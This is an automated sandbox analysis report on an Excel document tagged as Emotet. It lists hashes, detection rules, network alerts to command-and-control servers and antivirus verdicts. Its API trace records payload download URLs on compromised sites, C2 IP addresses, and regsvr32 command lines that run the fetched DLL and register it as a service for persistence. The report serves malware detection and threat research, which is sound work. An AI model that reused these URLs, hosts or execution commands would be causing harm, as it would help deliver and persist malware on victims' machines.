Summary | ZeroBOX

Iye11aStLm1

Tags
  • Excel with Emotet
  • Emotet
  • Malicious Library
  • MS_Excel_Hidden_Macro_Sheet
  • UPX
  • MSOffice File
  • PE File
  • DLL
  • OS Processor Check
  • PE32

Category FILE
Machine s1_win7_x6403_us
Started May 23, 2022, 9:32 a.m.
Completed May 23, 2022, 9:39 a.m.
Size 106.5KB
Type Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: DSAfadr, Last Saved By: HRdtjnd, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 18:19:34 2015, Last Saved Time/Date: Wed Mar 30 09:26:54 2022, Security: 0
MD5 9c8d23b78158bb374cb274c7682256e4
SHA256 7c9ef24f3522ff243e77f5d6e0cb50f6766916fcc1ad2fe845f9d509e39a6b3f
CRC32 7816DAC6
ssdeep 3072:QsKpbdrHYrMue8q7QPX+5xtekEdi8/dgstsSmsCpH3iZu8ZGsMi:XKpbdrHYrMue8q7QPX+5xtFEdi8/dgiX
Yara
  • Win32_Trojan_Excel_Emotet_20220329_Zero - Excel with Emotet
  • MS_Excel_Hidden_Macro_Sheet - (no description)
  • Microsoft_Office_File_Zero - Microsoft Office File

IP Address Status Action
104.131.11.205 Active Moloch
138.197.109.175 Active Moloch
164.124.101.2 Active Moloch
187.84.80.182 Active Moloch
213.128.75.146 Active Moloch
216.158.226.206 Active Moloch
68.183.94.239 Active Moloch
79.143.187.147 Active Moloch
81.95.101.8 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.103:49166 -> 81.95.101.8:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 81.95.101.8:443 -> 192.168.56.103:49167 2029340 ET INFO TLS Handshake Failure Potentially Bad Traffic
TCP 192.168.56.103:49176 -> 68.183.94.239:80 2404318 ET CNC Feodo Tracker Reported CnC Server group 19 A Network Trojan was detected
TCP 192.168.56.103:49165 -> 81.95.101.8:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.103:49179 -> 187.84.80.182:443 2404309 ET CNC Feodo Tracker Reported CnC Server group 10 A Network Trojan was detected
TCP 192.168.56.103:49180 -> 79.143.187.147:443 2404320 ET CNC Feodo Tracker Reported CnC Server group 21 A Network Trojan was detected
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2022053 ET MALWARE Likely Evil EXE download from MSXMLHTTP non-exe extension M2 A Network Trojan was detected
TCP 213.128.75.146:80 -> 192.168.56.103:49169 2014520 ET INFO EXE - Served Attached HTTP Misc activity
TCP 192.168.56.103:49177 -> 104.131.11.205:443 2404301 ET CNC Feodo Tracker Reported CnC Server group 2 A Network Trojan was detected
TCP 192.168.56.103:49178 -> 138.197.109.175:8080 2404304 ET CNC Feodo Tracker Reported CnC Server group 5 A Network Trojan was detected

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74de374b
NdrAllocate+0x5c8 RpcBindingFromStringBindingA-0xca4 rpcrt4+0x42b08 @ 0x74e02b08
NdrGetBuffer+0xf4 NdrSendReceive-0x6 rpcrt4+0x1801a @ 0x74dd801a
SLClose-0x28c osppc+0x2cb5 @ 0x6c4e2cb5
SLLoadApplicationPolicies+0xb30 SLCallServer-0x31f osppc+0x15629 @ 0x6c4f5629
SLClose+0x4d1 SLpBeginGenuineTicketTransaction-0x4703 osppc+0x3412 @ 0x6c4e3412
SLpGetTokenActivationGrantInfo+0xd8 SLpGenerateTokenActivationChallenge-0xad osppc+0x129af @ 0x6c4f29af
SLGetTokenActivationGrants+0x721 SLGetTokenActivationCertificates-0x7e7 osppcext+0x5a648 @ 0x6b29a648
_MsoWzFromIhtk@4+0x73207 mso+0x1404a94 @ 0x71dc4a94
_MsoWzFromIhtk@4+0x72f96 mso+0x1404823 @ 0x71dc4823
_MsoDwGimmeUserInstallBehavior@8+0x1ad15 _MsoHrShowMetSharedNotebooksDlg@20-0x7a9d0 mso+0xcc30d3 @ 0x716830d3
_MsoDwGimmeUserInstallBehavior@8+0x1aa61 _MsoHrShowMetSharedNotebooksDlg@20-0x7ac84 mso+0xcc2e1f @ 0x71682e1f
_MsoFreeCvsList@4+0x261dac _MsoPwlfFromFlinfo@8-0x3674 mso+0x4e2b05 @ 0x70ea2b05
_MsoFreeCvsList@4+0x2616fd _MsoPwlfFromFlinfo@8-0x3d23 mso+0x4e2456 @ 0x70ea2456
0x1d33e2b
_MsoHrSetupHTMLImport@8+0x2ee7 _MsoHrOscServicesManagerSharepointURL@8-0x8f03 mso+0x200fda @ 0x70bc0fda
_MsoHrSetupHTMLImport@8+0x27d9 _MsoHrOscServicesManagerSharepointURL@8-0x9611 mso+0x2008cc @ 0x70bc08cc
_MsoFIEPolicyAndVersion@8+0x37cd _MsoTelemetryOnEndVBAMacroCallback@0-0x3f32 mso+0x1efa61 @ 0x70bafa61
_MsoFIEPolicyAndVersion@8+0x3574 _MsoTelemetryOnEndVBAMacroCallback@0-0x418b mso+0x1ef808 @ 0x70baf808
_MsoFIEPolicyAndVersion@8+0x3534 _MsoTelemetryOnEndVBAMacroCallback@0-0x41cb mso+0x1ef7c8 @ 0x70baf7c8
_MsoFEnsureMsoTypelib@0+0x2a5 _MsoInitShrGlobal@4-0x1bdf mso+0x23b6d @ 0x709e3b6d
_MsoExtTextOutW@32+0x85f _MsoFWndProcNeeded@4-0x4a1 mso+0x222ad @ 0x709e22ad
_MsoFGetTbShowKbdShortcuts@0+0x8b11 _MsoFDigitCh@4-0xbf35 mso+0x1b522d @ 0x70b7522d
_MsoFGetTbShowKbdShortcuts@0+0x8a6d _MsoFDigitCh@4-0xbfd9 mso+0x1b5189 @ 0x70b75189
_MsoFGetTbShowKbdShortcuts@0+0x795f _MsoFDigitCh@4-0xd0e7 mso+0x1b407b @ 0x70b7407b
_MsoFGetTbShowKbdShortcuts@0+0x788d _MsoFDigitCh@4-0xd1b9 mso+0x1b3fa9 @ 0x70b73fa9
_MsoFGetTbShowKbdShortcuts@0+0x784f _MsoFDigitCh@4-0xd1f7 mso+0x1b3f6b @ 0x70b73f6b
MdCallBack12-0x64a760 excel+0x37a4a @ 0x247a4a
MdCallBack12-0x64de96 excel+0x34314 @ 0x244314
MdCallBack12-0x67d476 excel+0x4d34 @ 0x214d34
MdCallBack12-0x67d76a excel+0x4a40 @ 0x214a40
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0xc004f011
exception.offset: 46887
exception.address: 0x766fb727
registers.esp: 29028384
registers.edi: 29028548
registers.eax: 29028384
registers.ebp: 29028464
registers.edx: 0
registers.ebx: 29029600
registers.esi: 3221549073
registers.ecx: 2147483648
1 0 0
request GET http://www.garantihaliyikama.com/wp-admin/FjgB6I/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bd28000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6bf22000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10098000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x753d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b981000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b961000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2720
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00970000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74eb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74371000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b901000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6c051000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2720
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74d71000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000040d0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10098000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x753d1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b941000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9e1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9c1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2852
region_size: 135168
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00880000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b9a1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74bc1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74eb1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x74371000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2852
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x6b8c1000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetDiskFreeSpaceExW

total_number_of_free_bytes: 0
free_bytes_available: 10233565184
root_path: C:\Users\test22\AppData\Local\Microsoft\Windows\Explorer
total_number_of_bytes: 0
1 1 0
Application Crash Process EXCEL.EXE with pid 2396 crashed
file C:\Users\test22\urtj.dll
cmdline C:\Windows\SysWow64\regsvr32.exe -s ..\urtj.dll
cmdline C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2396
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x7ef70000
process_handle: 0xffffffff
1 0 0
process regsvr32.exe
host 104.131.11.205
host 138.197.109.175
host 187.84.80.182
host 216.158.226.206
host 68.183.94.239
host 79.143.187.147
service_name qrmzlhkfmktctc.xqw
service_path C:\Windows\SysWOW64\regsvr32.exe \s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
Time & API Arguments Status Return Repeated

CreateServiceW

service_start_name:
start_type: 2
password:
display_name: qrmzlhkfmktctc.xqw
filepath: C:\Windows\SysWOW64\regsvr32.exe \s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
service_name: qrmzlhkfmktctc.xqw
filepath_r: C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Cvvgrvwgvlwvwa\qrmzlhkfmktctc.xqw"
desired_access: 2
service_handle: 0x0067b6a8
error_control: 0
service_type: 16
service_manager_handle: 0x006aecb0
1 6796968 0
Time & API Arguments Status Return Repeated

URLDownloadToFileW

url: https://www.gessersh.com/wp-includes/ZwQLepW/
stack_pivoted: 0
filepath_r: ..\urtj.dll
filepath: C:\Users\test22\urtj.dll
2148270085 0

URLDownloadToFileW

url: http://www.garantihaliyikama.com/wp-admin/FjgB6I/
stack_pivoted: 0
filepath_r: ..\urtj.dll
filepath: C:\Users\test22\urtj.dll
1 0 0
parent_process excel.exe
martian_process C:\Windows\SysWow64\regsvr32.exe -s ..\urtj.dll
Lionic Trojan.MSOffice.Generic.4!c
MicroWorld-eScan XLM.Trojan.Abracadabra.42.Gen
CAT-QuickHeal OLE.Emotet.46220
ALYac XLM.Trojan.Abracadabra.42.Gen
Sangfor Malware.Generic-XLM.Save.ma29
K7AntiVirus Trojan ( 0059086a1 )
K7GW Trojan ( 0059086a1 )
Arcabit XLM.Trojan.Abracadabra.42.Gen
VirIT X97M.Emotet.DGZ
Cyren XF/Emotet.C.gen!Eldorado
Symantec Scr.Malcode!gen
ESET-NOD32 DOC/TrojanDownloader.Agent.DXQ
TrendMicro-HouseCall Trojan.X97M.EMOTET.YXCC5Z
Avast VBS:Malware-gen
Kaspersky HEUR:Trojan.MSOffice.Generic
BitDefender XLM.Trojan.Abracadabra.42.Gen
Tencent OLE.Win32.Macro.704610
Ad-Aware XLM.Trojan.Abracadabra.42.Gen
Emsisoft XLM.Trojan.Abracadabra.42.Gen (B)
F-Secure Malware.W97M/YAV.Minerva.dtfit
DrWeb Exploit.Siggen3.30359
TrendMicro Trojan.X97M.EMOTET.YXCC5Z
McAfee-GW-Edition X97M/Downloader.om
FireEye XLM.Trojan.Abracadabra.42.Gen
Sophos Mal/DocDl-M
Ikarus Trojan-Downloader.XLM.Agent
Avira W97M/YAV.Minerva.dtfit
Microsoft TrojanDownloader:O97M/Emotet.AMDF!MTB
ViRobot XLS.Z.Agent.109056.MI
ZoneAlarm HEUR:Trojan.MSOffice.Generic
GData XLM.Trojan.Abracadabra.42.Gen
Cynet Malicious (score: 99)
AhnLab-V3 Downloader/XLS.XlmMacro.S1792
McAfee X97M/Downloader.om
MAX malware (ai score=87)
Zoner Probably Heur.W97ShellB
Rising Downloader.Agent/XLM!1.DCEE (CLASSIC)
Fortinet XF/CoinMiner.Z!tr
AVG VBS:Malware-gen
dead_host 79.143.187.147:443
dead_host 104.131.11.205:443
dead_host 192.168.56.103:49180
dead_host 138.197.109.175:8080
dead_host 68.183.94.239:80
dead_host 187.84.80.182:443